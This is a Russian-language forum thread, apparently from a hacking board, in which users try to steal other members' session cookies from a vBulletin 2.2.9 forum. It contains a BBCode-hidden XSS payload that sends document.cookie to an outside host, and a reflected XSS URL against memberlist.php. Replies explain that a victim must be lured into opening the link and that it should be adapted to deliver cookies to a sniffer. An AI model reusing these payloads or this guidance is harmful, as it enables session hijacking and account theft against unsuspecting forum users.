Есть форум vBulletin 2.2.9 Судя по всему админы не поленились и закрыли (казалось бы все возможные дыры). Пробовал множество инъекций в сообщениях, но они все видны или видны на половину Пример: Вставлял: HTML: [url]http://www.[url=http://wj.com/style=display:none,background:url(javascript:docum ent.images[1].src="http://antichat.ru/cgi-bin/s.jp g?"+document.cookie,) ]wj[/url][/url] Форум выводил: HTML: [url]http://www..src="http://antichat.ru/cgi-bin/s.jp g?"+document.cookie,) ]wj[/url] как раз то что должно быть скрыто он и выводит! Хотелось бы побольше узнать про инъекции, как и что надо менять чтобы ее видно не было. Заранее спасибо.
Если он выводит тебе сообщение, т.е. тот код что ты ввел, то значит он (код) не сработал => скрытие тебе не поможет, результатом работы кода (обычно) является алерт, или спи**ивание куков, и это никак не отображается... т.е. ты в сам код внедряешь свой код... так что те коды у тебя не работает.
Это нельзя "обойти", если код не работает - значит уже пропатчили, ищи другой код или уязвимости в этой версии форума. Поищи баги на СекЛабе(http://securitylab.ru)
на секлабе нашел прочку, вот: Code: memberlist.php?ХХХs= ХХХ 23c37cf1af5d2ad05f49361b0407 ХХ ad9e&what=">"<Script>javascript:alert(document.cookie)</Script> помог мне добыть мои же кукис, когда я был на форуме и ввел это в броузер! а как достать нужные кукис пока не знаю (есть предложения ? )
Прально, чтобы добыть чужие кукис нужно чтобы другой чел открыл тему/пост с кодом, который пи*дит куки...
Дык чтобы использовать и получать чужие кукис это Code: http://www.vbulletin.com/forum/memberlist.php? Х s Х = Х 23c37cf1af5d2ad05f49361b0407 ХХХ ad9e &what=">"<Scr*ipt>javascript:alert(document.cookie)</Scr*ipt> нужно как нибудь преобразовать, ведь эта фактически ссылка а не инъекция или еще что! и работает она на добавлении кода с получением кукисов
правильно, но эту ссылку должна как я понимаю открывать Жертва + ссылку надо модернизировать чтоб на снифер снимать кукисы
